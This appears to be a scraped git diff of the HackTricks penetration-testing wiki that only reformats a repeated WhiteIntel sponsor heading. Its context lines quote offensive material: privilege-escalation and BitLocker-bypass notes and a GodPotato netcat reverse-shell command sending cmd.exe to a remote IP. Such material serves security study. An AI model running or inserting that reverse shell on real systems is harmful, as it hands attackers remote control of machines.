* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -129,7 +129,7 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t
|
||||||
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
||||||
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -80,7 +80,7 @@ BitLocker encryption can potentially be bypassed if the **recovery password** is
|
||||||
|
|
||||||
A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.
|
A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -206,7 +206,7 @@ This will list the possible contents from the EEPROM as per the signatures found
|
||||||
Although, it is necessary to note that it's not always the case that the <b>uboot</b> is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if <b>uboot</b> is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention <b>uboot</b> while booting.
|
Although, it is necessary to note that it's not always the case that the <b>uboot</b> is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if <b>uboot</b> is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention <b>uboot</b> while booting.
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -132,7 +132,7 @@ Take a look to [**all the possible token privileges and some definitions on this
|
||||||
Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
|
Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
|
||||||
|
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -155,7 +155,7 @@ Then download [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/maste
|
||||||
|
|
||||||
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
@ -96,7 +96,7 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
||||||
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
||||||
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||||
|
|
||||||
## WhiteIntel
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue